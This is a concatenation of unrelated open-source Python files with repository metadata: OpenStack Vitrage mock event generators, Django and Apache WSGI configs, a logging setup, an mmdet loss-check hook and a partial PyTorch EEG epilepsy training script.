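    print('URL patterns OK')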
|
[
"hagarhosny19@gmail.com"
] |
hagarhosny19@gmail.com
|
486b0bc4ab7101ed1242be7c341f55b6a0ddedfd
|
f62fd455e593a7ad203a5c268e23129473d968b6
|
/vitrage-1.5.2/vitrage/tests/mocks/mock_driver.py
|
d614d822510efc12f16fcaeff09d09236e599f20
|
[
"Apache-2.0"
] |
permissive
|
MinbinGong/OpenStack-Ocata
|
5d17bcd47a46d48ff9e71e2055f667836174242f
|
8b7650128cfd2fdf5d6c8bc4613ac2e396fb2fb3
|
refs/heads/master
| 2021-06-23T05:24:37.799927
| 2017-08-14T04:33:05
| 2017-08-14T04:33:05
| 99,709,985
| 0
| 2
| null | 2020-07-22T22:06:22
| 2017-08-08T15:48:44
|
Python
|
UTF-8
|
Python
| false
| false
| 20,845
|
py
|
# Copyright 2015 - Alcatel-Lucent
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Methods for generating driver events
For each type of entity, need to supply configuration files that specify (a
regex of) what can be returned, which will be used to generate driver events
usage example:
test_entity_spec_list = [
{mg.DYNAMIC_INFO_FKEY: 'driver_inst_snapshot_dynamic.json',
mg.STATIC_INFO_FKEY: 'driver_inst_snapshot_static.json',
mg.MAPPING_KEY: [('vm1', 'host1'), ('vm2', 'host1'), ('vm3','host2')],
mg.NAME_KEY: 'Instance (vm) generator',
NUM_EVENTS_KEY: 10
}
]
spec_list = get_mock_generators(test_entity_spec_list)
events = generate_random_events_list(spec_list)
for e in events:
print e
"""
import random
from vitrage.common.constants import DatasourceAction
from vitrage.common.constants import DatasourceProperties as DSProps
import vitrage.tests.mocks.trace_generator as tg
from vitrage.utils.datetime import utcnow
def generate_random_events_list(generator_spec_list):
"""Generates random events for the generators given.
Each element in the list of generators includes a generator and
    number of events to generate for its entities
:param generator_spec_list: list of generators
:type generator_spec_list: list
:return list of driver events
:rtype list
"""
data = []
for spec in generator_spec_list:
generator = spec[tg.GENERATOR]
data += tg.generate_data_stream(generator.models, spec[tg.NUM_EVENTS])
random.shuffle(data)
return data
def generate_sequential_events_list(generator_spec_list):
"""Generates random events for the generators given.
Each element in the list of generators includes a generator and
number of events to generate for it's entities
:param generator_spec_list: list of generators
:type generator_spec_list: list
:return list of driver events
:rtype list
"""
data = []
for spec in generator_spec_list:
generator = spec[tg.GENERATOR]
data += tg.generate_round_robin_data_stream(generator.models,
spec[tg.NUM_EVENTS])
return data
def simple_instance_generators(host_num, vm_num,
snapshot_events=0, update_events=0,
snap_vals=None, update_vals=None):
"""A function for returning vm event generators.
Returns generators for a given number of hosts and
instances. Instances will be distributed across hosts in round-robin style.
:param host_num: number of hosts
:param vm_num: number of vms
:param snapshot_events: number of snapshot events per instance
:param update_events: number of update events per instance
:param snap_vals: preset vals for ALL snapshot events
:param update_vals: preset vals for ALL update events
:return: generators for vm_num vms as specified
"""
mapping = [('vm-{0}'.format(index), 'host-{0}'.format(index % host_num))
for index in range(vm_num)
]
test_entity_spec_list = []
if snapshot_events:
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_INST_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: tg.DRIVER_INST_SNAPSHOT_S,
tg.EXTERNAL_INFO_KEY: snap_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Instance (vm) snapshot generator',
tg.NUM_EVENTS: snapshot_events
}
)
if update_events:
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_INST_UPDATE_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: update_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Instance (vm) update generator',
tg.NUM_EVENTS: update_events
}
)
return tg.get_trace_generators(test_entity_spec_list)
def simple_host_generators(zone_num, host_num, snapshot_events=0,
snap_vals=None):
"""A function for returning vm event generators.
Returns generators for a given number of hosts and
instances. Instances will be distributed across hosts in round-robin style.
:param zone_num: number of zones
:param host_num: number of hosts
:param snapshot_events: number of snapshot events per host
:param snap_vals: preset vals for ALL snapshot events
:return: generators for host_num hosts as specified
"""
mapping = [('host-{0}'.format(index), 'zone-{0}'.format(index % zone_num))
for index in range(host_num)
]
test_entity_spec_list = []
if snapshot_events:
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_HOST_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: snap_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Host snapshot generator',
tg.NUM_EVENTS: snapshot_events
}
)
return tg.get_trace_generators(test_entity_spec_list)
def simple_zone_generators(zone_num, host_num, snapshot_events=0,
snap_vals=None):
"""A function for returning zone event generators.
Returns generators for a given number of hosts and
zones. Hosts will be distributed across zones in round-robin style.
:param zone_num: number of zones
:param host_num: number of hosts
:param snapshot_events: number of snapshot events per zone
:param snap_vals: preset vals for ALL snapshot events
:return: generators for zone_num zones as specified
"""
mapping = [('host-{0}'.format(index), 'zone-{0}'.format(index % zone_num))
for index in range(host_num)
]
test_entity_spec_list = []
if snapshot_events:
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_ZONE_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: snap_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Zone snapshot generator',
tg.NUM_EVENTS: snapshot_events
}
)
return tg.get_trace_generators(test_entity_spec_list)
def simple_volume_generators(volume_num, instance_num,
snapshot_events=0, update_events=0,
snap_vals=None, update_vals=None):
"""A function for returning vm event generators.
Returns generators for a given number of volumes and
instances. Instances will be distributed across hosts in round-robin style.
:param update_vals: number of values from update event
:param update_events: number of events from update event
:param volume_num: number of volumes
:param instance_num: number of instances
:param snapshot_events: number of snapshot events per host
:param snap_vals: preset vals for ALL snapshot events
:return: generators for volume_num volumes as specified
"""
mapping = [('volume-{0}'.format(index % volume_num),
'vm-{0}'.format(index))
for index in range(instance_num)
]
test_entity_spec_list = []
if snapshot_events:
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_VOLUME_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: snap_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Volume snapshot generator',
tg.NUM_EVENTS: snapshot_events
}
)
if update_events:
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_VOLUME_UPDATE_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: update_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Volume update generator',
tg.NUM_EVENTS: update_events
}
)
return tg.get_trace_generators(test_entity_spec_list)
def simple_stack_generators(stack_num, instance_and_volume_num,
snapshot_events=0, update_events=0,
snap_vals=None, update_vals=None):
"""A function for returning vm event generators.
Returns generators for a given number of stacks, instances and
volumes. Instances and Volumes will be distributed across stacks in
round-robin style.
:param update_vals: number of values from update event
:param update_events: number of events from update event
:param stack_num: number of stacks
:param volume_num: number of volumes
:param instance_num: number of instances
:param snapshot_events: number of snapshot events per host
:param snap_vals: preset vals for ALL snapshot events
:return: generators for volume_num volumes as specified
"""
    mapping = [('stack-{0}'.format(index % stack_num),
                'stack-vm-{0}'.format(index),
                'stack-volume-{0}'.format(index))
for index in range(instance_and_volume_num)
]
test_entity_spec_list = []
if snapshot_events:
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_STACK_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: snap_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Stack snapshot generator',
tg.NUM_EVENTS: snapshot_events
}
)
if update_events:
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_STACK_UPDATE_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: update_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Stack update generator',
tg.NUM_EVENTS: update_events
}
)
return tg.get_trace_generators(test_entity_spec_list)
def simple_consistency_generators(consistency_num, update_events=0,
snap_vals=None, update_vals=None):
"""A function for returning consistency event generators.
Returns generators for a given number of consistency events.
Instances will be distributed across hosts in round-robin style.
    :param update_vals: preset vals for ALL update events
    :param update_events: number of update events
    :param consistency_num: number of consistency events
:param snap_vals: preset vals for ALL snapshot events
:return: generators for consistency_num consistency events as specified
"""
test_entity_spec_list = []
if update_events:
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_CONSISTENCY_UPDATE_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: update_vals,
tg.MAPPING_KEY: consistency_num,
tg.NAME_KEY: 'Consistency update generator',
tg.NUM_EVENTS: update_events
}
)
return tg.get_trace_generators(test_entity_spec_list)
def simple_switch_generators(switch_num, host_num,
snapshot_events=0, snap_vals=None,
update_events=0, update_vals=None):
"""A function for returning switch events generators.
Returns generators for a given number of switches and hosts.
Hosts will be distributed across switches in round-robin style.
Switches are interconnected in a line.
    :param update_vals: preset values for ALL update events
    :param update_events: number of update events per switch
    :param switch_num: number of switches
    :param host_num: number of hosts
    :param snapshot_events: number of snapshot events per switch
:param snap_vals: preset values for ALL snapshot events
:return: generators for switch events as specified
"""
mapping = [('host-{0}'.format(index), 'switch-{0}'.format(index %
switch_num))
for index in range(host_num)
]
test_entity_spec_list = []
if snapshot_events:
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_SWITCH_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: snap_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Switch snapshot generator',
tg.NUM_EVENTS: snapshot_events
}
)
if update_events:
update_vals = {} if not update_vals else update_vals
update_vals['vitrage_datasource_action'] = 'update'
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_SWITCH_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: update_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Switch update generator',
tg.NUM_EVENTS: update_events
}
)
return tg.get_trace_generators(test_entity_spec_list)
def simple_static_generators(switch_num=2, host_num=10,
snapshot_events=0, snap_vals=None,
update_events=0, update_vals=None):
"""A function for returning static datasource events generators.
Returns generators for a given number of routers, switches and hosts.
Hosts will be distributed across switches in round-robin style.
Switches are interconnected in a line.
    :param switch_num: number of switches
    :param host_num: number of hosts
    :param snapshot_events: number of snapshot events per switch
    :param snap_vals: preset values for ALL snapshot events
    :param update_events: number of update events per switch
    :param update_vals: preset values for update events
:return: generators for static datasource events
"""
    # TODO(yujunz) mock routers that connect all switches
mapping = [(host_index, host_index % switch_num)
for host_index in range(host_num)]
test_entity_spec_list = []
if snapshot_events > 0:
if snap_vals is None:
snap_vals = {}
snap_vals.update({
DSProps.DATASOURCE_ACTION: DatasourceAction.SNAPSHOT,
DSProps.SAMPLE_DATE: utcnow()})
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_STATIC_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: tg.DRIVER_STATIC_SNAPSHOT_S,
tg.EXTERNAL_INFO_KEY: snap_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Static snapshot generator',
tg.NUM_EVENTS: snapshot_events
}
)
if update_events > 0:
if update_vals is None:
update_vals = {}
update_vals.update({
DSProps.DATASOURCE_ACTION: DatasourceAction.UPDATE,
DSProps.SAMPLE_DATE: utcnow()})
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_STATIC_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: update_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Static update generator',
tg.NUM_EVENTS: update_events
}
)
return tg.get_trace_generators(test_entity_spec_list)
def simple_nagios_alarm_generators(host_num,
events_num=0,
snap_vals=None):
"""A function for returning Nagios alarm event generators.
Returns generators for a given number of Nagios alarms.
:param host_num: number of hosts
    :param events_num: total number of snapshot alarms across hosts
    :param snap_vals: preset vals for ALL snapshot events
    :return: generators for host_num hosts as specified
"""
hosts = ['host-{0}'.format(index) for index in range(host_num)]
test_entity_spec_list = []
if events_num:
test_entity_spec_list.append({
tg.DYNAMIC_INFO_FKEY: tg.DRIVER_NAGIOS_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: snap_vals,
tg.MAPPING_KEY: hosts,
tg.NAME_KEY: 'Nagios alarm generator (alarm on)',
tg.NUM_EVENTS: max(events_num - len(hosts), 0)
})
test_entity_spec_list.append({
tg.DYNAMIC_INFO_FKEY: tg.DRIVER_NAGIOS_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: tg.DRIVER_NAGIOS_SNAPSHOT_S,
tg.EXTERNAL_INFO_KEY: snap_vals,
tg.MAPPING_KEY: hosts,
tg.NAME_KEY: 'Nagios alarm generator (alarm off)',
tg.NUM_EVENTS: len(hosts)
})
return tg.get_trace_generators(test_entity_spec_list)
def simple_zabbix_alarm_generators(host_num,
events_num=0,
snap_vals=None):
"""A function for returning Zabbix alarm event generators.
Returns generators for a given number of Zabbix alarms.
:param host_num: number of hosts
    :param events_num: total number of snapshot alarms across hosts
    :param snap_vals: preset vals for ALL snapshot events
    :return: generators for host_num hosts as specified
"""
hosts = ['host-{0}'.format(index) for index in range(host_num)]
test_entity_spec_list = []
if events_num:
test_entity_spec_list.append({
tg.DYNAMIC_INFO_FKEY: tg.DRIVER_ZABBIX_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: snap_vals,
tg.MAPPING_KEY: hosts,
tg.NAME_KEY: 'Zabbix alarm generator (alarm on)',
tg.NUM_EVENTS: max(events_num - len(hosts), 0)
})
test_entity_spec_list.append({
tg.DYNAMIC_INFO_FKEY: tg.DRIVER_ZABBIX_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: snap_vals,
tg.MAPPING_KEY: hosts,
tg.NAME_KEY: 'Zabbix alarm generator (alarm off)',
tg.NUM_EVENTS: len(hosts)
})
return tg.get_trace_generators(test_entity_spec_list)
def simple_doctor_alarm_generators(update_vals=None):
"""A function for returning Doctor alarm event generators.
Returns generators for a given number of Doctor alarms.
:param update_vals: preset values for ALL update events
:return: generators for alarms as specified
"""
test_entity_spec_list = [({
tg.DYNAMIC_INFO_FKEY: tg.DRIVER_DOCTOR_UPDATE_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: update_vals,
tg.MAPPING_KEY: None,
tg.NAME_KEY: 'Doctor alarm generator',
tg.NUM_EVENTS: 1
})]
return tg.get_trace_generators(test_entity_spec_list)
def simple_collectd_alarm_generators(update_vals=None):
"""A function for returning Collectd alarm event generators.
Returns generators for a given number of Collectd alarms.
:param update_vals: preset values for ALL update events
:return: generators for alarms as specified
"""
test_entity_spec_list = [({
tg.DYNAMIC_INFO_FKEY: tg.DRIVER_COLLECTD_UPDATE_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: update_vals,
tg.MAPPING_KEY: None,
tg.NAME_KEY: 'Collectd alarm generator',
tg.NUM_EVENTS: 1
})]
return tg.get_trace_generators(test_entity_spec_list)
def simple_aodh_alarm_notification_generators(alarm_num,
update_events=0,
update_vals=None):
"""A function for returning aodh alarm event generators.
Returns generators for a given number of Aodh alarms.
:param alarm_num: number of alarms
:param update_events: number of update alarms
:param update_vals: preset vals for ALL update events
    :return: generators for alarm_num alarms as specified
"""
alarms = ['alarm-{0}'.format(index) for index in range(alarm_num)]
test_entity_spec_list = [
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_AODH_UPDATE_D,
tg.STATIC_INFO_FKEY: None,
tg.MAPPING_KEY: alarms,
tg.EXTERNAL_INFO_KEY: update_vals,
tg.NAME_KEY: 'Aodh update generator',
tg.NUM_EVENTS: update_events
}
]
return tg.get_trace_generators(test_entity_spec_list)
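
# Hedged usage sketch (added; assumes the vitrage test tree is importable):
# build mock generators for 2 hosts / 4 vms with 3 snapshot events per vm,
# then emit a shuffled driver-event stream.
if __name__ == '__main__':
    specs = simple_instance_generators(host_num=2, vm_num=4, snapshot_events=3)
    for event in generate_random_events_list(specs):
        print(event)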
|
[
"gongwayne@hotmail.com"
] |
gongwayne@hotmail.com
|
797065c6157a5fa68bb700be7ae66a1e048fd278
|
a237987cb60e532b7828ad664c9ea852dd0399d2
|
/wujin/wsgi.py
|
9981fcc9c9165d86ab3ad7a6e578109b8048588b
|
[] |
no_license
|
liao820/wujin821
|
b37ea937e46d57ec4b8f2731d37ea477ab993f96
|
b71924fc602e7e487114641280a85bcb97192045
|
refs/heads/master
| 2023-04-21T23:20:17.888643
| 2021-05-16T14:42:08
| 2021-05-16T14:42:08
| 365,676,888
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 403
|
py
|
"""
WSGI config for wujin project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'wujin.settings')
application = get_wsgi_application()
|
[
"2869799543@qq.com"
] |
2869799543@qq.com
|
ae8c0e9c939e3f951a2745563148f89f1112682a
|
42e8317d12198c1cf6c0a3420242e17a745b33ee
|
/beneficiaries/beneficiaries/doctype/beneficiary/test_beneficiary.py
|
f1c38ca06ae89f62ee98cdd1f4863b69dc0827b0
|
[
"MIT"
] |
permissive
|
alkuhlani/beneficiaries
|
8fd50a1e606935b69fc6f4c03f0514a7a8345cdb
|
11208fe88e3e848458473d12836b157895646c5c
|
refs/heads/main
| 2023-07-19T06:26:45.968349
| 2021-08-31T06:02:15
| 2021-08-31T06:02:15
| 401,810,336
| 0
| 1
|
NOASSERTION
| 2021-08-31T18:47:58
| 2021-08-31T18:47:57
| null |
UTF-8
|
Python
| false
| false
| 209
|
py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2021, Baida and Contributors
# See license.txt
from __future__ import unicode_literals
# import frappe
import unittest
class TestBeneficiary(unittest.TestCase):
pass
|
[
"frappe@ubuntu.vm"
] |
frappe@ubuntu.vm
|
27898ef54858c5f3064cd761ca387ef291908a7b
|
80bc1e07b55aef418cf195c26f7861d17fb73711
|
/src/logger.py
|
ba22057890f26afa42fac9edaed7477ed511f25b
|
[] |
no_license
|
alexgeer/gravitys-name-bot
|
75d6f71da42b871cf20ef9f1579b408ad32cbd6c
|
5837a9624cd7d1696ab31b6c7dd7970ed0132a48
|
refs/heads/main
| 2023-01-28T06:10:43.835410
| 2020-12-06T00:04:00
| 2020-12-06T00:04:00
| 318,890,647
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 376
|
py
|
import logging
from sys import stdout
logger = logging.getLogger()
logger.setLevel(logging.INFO)  # set the level directly; basicConfig would attach a second, duplicate handler
logFormatter = logging.Formatter(
    "%(name)-12s %(asctime)s %(levelname)-8s %(filename)s:%(funcName)s %(message)s")
consoleHandler = logging.StreamHandler(stdout) #set streamhandler to stdout
consoleHandler.setFormatter(logFormatter)
logger.addHandler(consoleHandler)
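
# Example (added): module-level loggers inherit the root handler configured
# above, so other files only need logging.getLogger(__name__).
log = logging.getLogger(__name__)
log.info("logger configured; messages go to stdout")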
|
[
"geer.alex@gmail.com"
] |
geer.alex@gmail.com
|
578fc9fd60b9b25c349184e8f7a81c47e9d82794
|
0510e4947e51d132ef2d637c5522b41aa84848aa
|
/src/apache.wsgi
|
a7a7e2730499ae3bebf8dbeba3be7c7f9396ff26
|
[] |
no_license
|
esauro/akademic
|
c03c32e652d04fd0651b9a6a1f4f49eb2c1d0682
|
0174b7608f66c3626b8a1d19eadd9f01cc52ebfa
|
refs/heads/master
| 2021-01-18T05:39:21.220337
| 2010-10-15T13:34:58
| 2010-10-15T13:34:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 363
|
wsgi
|
#!/usr/bin/env python
import os
import sys
sys.stdout = sys.stderr
p = os.path.dirname(os.path.realpath(__file__))
sys.path.append(p)
sys.path.append(p+"/..")
os.environ['PYTHON_EGG_CACHE'] = os.path.join(p, 'egg-cache')
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
import django.core.handlers.wsgi
application = django.core.handlers.wsgi.WSGIHandler()
|
[
"rene@minicroso.(none)"
] |
rene@minicroso.(none)
|
472a3216a25433e238d084a88264ae6008207241
|
8ef8e6818c977c26d937d09b46be0d748022ea09
|
/cv/detection/autoassign/pytorch/mmdet/core/hook/checkloss_hook.py
|
66a3c1176255137f17a08288cd4a4b82aca77323
|
[
"Apache-2.0"
] |
permissive
|
Deep-Spark/DeepSparkHub
|
eb5996607e63ccd2c706789f64b3cc0070e7f8ef
|
9d643e88946fc4a24f2d4d073c08b05ea693f4c5
|
refs/heads/master
| 2023-09-01T11:26:49.648759
| 2023-08-25T01:50:18
| 2023-08-25T01:50:18
| 534,133,249
| 7
| 6
|
Apache-2.0
| 2023-03-28T02:54:59
| 2022-09-08T09:07:01
|
Python
|
UTF-8
|
Python
| false
| false
| 705
|
py
|
# Copyright (c) OpenMMLab. All rights reserved.
import torch
from mmcv.runner.hooks import HOOKS, Hook
@HOOKS.register_module()
class CheckInvalidLossHook(Hook):
"""Check invalid loss hook.
This hook will regularly check whether the loss is valid
during training.
Args:
interval (int): Checking interval (every k iterations).
Default: 50.
"""
def __init__(self, interval=50):
self.interval = interval
def after_train_iter(self, runner):
if self.every_n_iters(runner, self.interval):
assert torch.isfinite(runner.outputs['loss']), \
runner.logger.info('loss become infinite or NaN!')
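
# Hedged usage note (added): with mmcv's registry, this hook is typically
# enabled from a config file via the custom_hooks list, e.g.
#   custom_hooks = [dict(type='CheckInvalidLossHook', interval=50)]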
|
[
"jia.guo@iluvatar.ai"
] |
jia.guo@iluvatar.ai
|
38a1c9d2ddfc2c0402295ab8f9bb7a0641dcc58c
|
1e07111c8d3173fa931923a86c43555c2d58948a
|
/CHB/train_model.py
|
3160ec136a04d8c825e9fdacaacf4217a9e5ec61
|
[] |
no_license
|
whubaichuan/Epilepsy
|
07c29639ba8da5f6f3f191d32e0ac560159839ca
|
88cee770fd3fc42e14d876d22fafc0dc911dab2c
|
refs/heads/master
| 2023-08-05T04:14:20.000682
| 2021-09-29T21:23:04
| 2021-09-29T21:23:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,558
|
py
|
# -*- coding: utf-8 -*-
import os
import h5py
import time
import copy
import tqdm
import argparse
import numpy as np
import scipy.io as sio
import os.path as osp
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils import data
import torch.nn.functional as F
from torch.autograd import Variable
from torchvision import datasets, transforms
from torch.optim.lr_scheduler import LambdaLR, StepLR, MultiStepLR, ExponentialLR, ReduceLROnPlateau
from model.network_FC1D import Net
# from model.network_FC1D_50 import Net
parser = argparse.ArgumentParser(description='PyTorch Epilepsy')
parser.add_argument('--batch_size', type=int, default=16, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test_batch_size', type=int, default=1000, metavar='N',
help='input batch size for testing (default: 1000)')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 10)')
parser.add_argument('--lr', type=float, default=0.0001, metavar='LR',
help='learning rate (default: 0.0001)')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
parser.add_argument('--gamma', type=float, default=0.0005, metavar='M',
help='learning rate decay factor (default: 0.0005)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=20, metavar='N',
help='how many batches to wait before '
'logging training status')
parser.add_argument('--gpuNum', type=str, default='3',
help='number of gpu for test')
parser.add_argument('--foldNum', type=str, default='Exp1',
help='fold to evaluate in 3 fold cross val')
parser.add_argument('--config', type=str, default='FIRST',
help='configuration to load data')
parser.add_argument('--data_path', type=str, default='media/user_home2/EEG/Epilepsy/data',
help='folder that contains the database for training')
parser.add_argument('--save', type=str, default='model.pt',
help='file on which to save model weights')
parser.add_argument('--outf', default='/media/user_home2/EEG/Epilepsy/models', help='folder to output model')
parser.add_argument('--resume', default='', help="path to model (to continue training)")
parser.add_argument('--finetune', default='', help="path to model weights for finetuning")
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
torch.manual_seed(args.seed)
if args.cuda:
torch.cuda.manual_seed(args.seed)
kwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}
# set GPU number
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpuNum
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# Load dataset for training and validation
path_to_data = args.data_path
class Dataset(data.Dataset):
'Characterizes a dataset for PyTorch'
def __init__(self, list_IDs, labels, transform=None):
'Initialization'
self.labels = labels
self.list_IDs = list_IDs
self.transform = transform
def __len__(self):
'Denotes the total number of samples'
return len(self.list_IDs)
def __getitem__(self, index):
'Generates one sample of data'
# Select sample
ID = self.list_IDs[index]
# Load data and get label
y = self.labels[ID]
X = np.load(path_to_data +ID + '.npy')
X = np.transpose(X) #23x1024
X = np.expand_dims(X, axis=0) #1x23x1024
if self.transform:
X = self.transform(X)
return X, y
path_to_dicts = '/media/user_home1/EEG/Epilepsy/data/configs/'
partition = np.load(path_to_dicts + 'partitions_' + args.config + args.foldNum+'.npy').item()
labels = np.load(path_to_dicts + 'labels_' + args.config + args.foldNum + '.npy').item()
image_datasets = {x: Dataset(partition[x], labels,transform=transforms.Compose([transforms.ToTensor()])) for x in ['train', 'validation']}
dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=args.batch_size, shuffle=True, num_workers=4) for x in ['train', 'validation']}
train_loader = dataloaders['train']
test_loader = dataloaders['validation']
dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'validation']}
print('training dataset size:', dataset_sizes['train'])
print('Validation dataset size:', dataset_sizes['validation'])
print('Done creating dataloader \n')
# custom weights initialization called on netG and netD
##
def weights_init(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
m.weight.data.normal_(0.00, 0.01)
m.bias.data.fill_(0.1)
elif classname.find('GroupNorm') != -1:
m.weight.data.fill_(1)
m.bias.data.zero_()
# Load Network
model = Net()
model.apply(weights_init)
res_flag = 0
if args.finetune != '': # For training from a previously saved state
model.load_state_dict(torch.load(args.finetune))
res_flag = 1
# freeze and unfreeze layers
for param in model.parameters():
param.requires_grad = False
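# NOTE (added): this loop sets requires_grad=False on every parameter, so if it
# runs the SGD optimizer created below has no trainable weights; unfreeze the
# layers that should keep learning (e.g. the final classifier).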
print(model)
if args.cuda:
model.cuda()
load_model = False
if osp.exists(args.save):
with open(args.save, 'rb') as fp:
state = torch.load(fp)
model.load_state_dict(state)
load_model = True
optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)
criterion = nn.CrossEntropyLoss()
def train(epoch, criterion, optimizer):
model.train()
train_loss = 0
correct = 0
running_loss = 0.0
running_corrects = 0
for data, target in tqdm.tqdm(dataloaders['train'], total=len(dataloaders['train']), desc='Batch'):
data = data.to(device)
data = torch.squeeze(data)
data = data.float()
        target = target.to(device)
if args.cuda:
data, target = data.cuda(), target.cuda()
optimizer.zero_grad()
output = model(data)
loss = criterion(output, target)
train_loss += loss.data
sm = nn.Softmax(dim=1)
output_sm = sm(output)
_, preds = torch.max(output_sm, 1)
running_loss += loss.item() * data.size(0)
running_corrects += torch.sum(preds == target.data)
loss.backward()
optimizer.step()
epoch_loss = running_loss / dataset_sizes['train']
epoch_acc = running_corrects.double() / dataset_sizes['train']
line_to_save_train = 'Train set: Average loss: {:.4f} Accuracy: {}/{} {:.4f}\n'.format(epoch_loss,
running_corrects,
len(train_loader.dataset),
epoch_acc)
with open(args.outf+'/ACC_train.txt','a') as f:
f.write(line_to_save_train)
print(line_to_save_train)
def test(epoch):
model.eval()
test_loss = 0
correct = 0
running_loss = 0.0
running_corrects = 0
for data, target in tqdm.tqdm(dataloaders['validation'], total=len(dataloaders['validation']), desc='Batch'):
data = data.to(device)
data = data.float()
data = torch.squeeze(data)
        target = target.to(device)
if args.cuda:
data, target = data.cuda(), target.cuda()
output = model(data)
sm = nn.Softmax(dim=1)
output_sm = sm(output)
_, preds = torch.max(output_sm, 1)
loss = criterion(output, target)
running_loss += loss.item() * data.size(0)
running_corrects += torch.sum(preds == target.data)
epoch_loss = running_loss / dataset_sizes['validation']
epoch_acc = running_corrects.double() / dataset_sizes['validation']
line_to_save_test = 'Test set: Average loss: {:.4f} Accuracy: {}/{} {:.4f}\n'.format(epoch_loss,
running_corrects,
dataset_sizes['validation'],
epoch_acc)
with open(args.outf+'/ACC_test.txt','a') as f:
f.write(line_to_save_test)
print(line_to_save_test)
return epoch_loss, epoch_acc
def adjust_learning_rate(optimizer, epoch):
#lr = args.lr * (gamma ** (step))
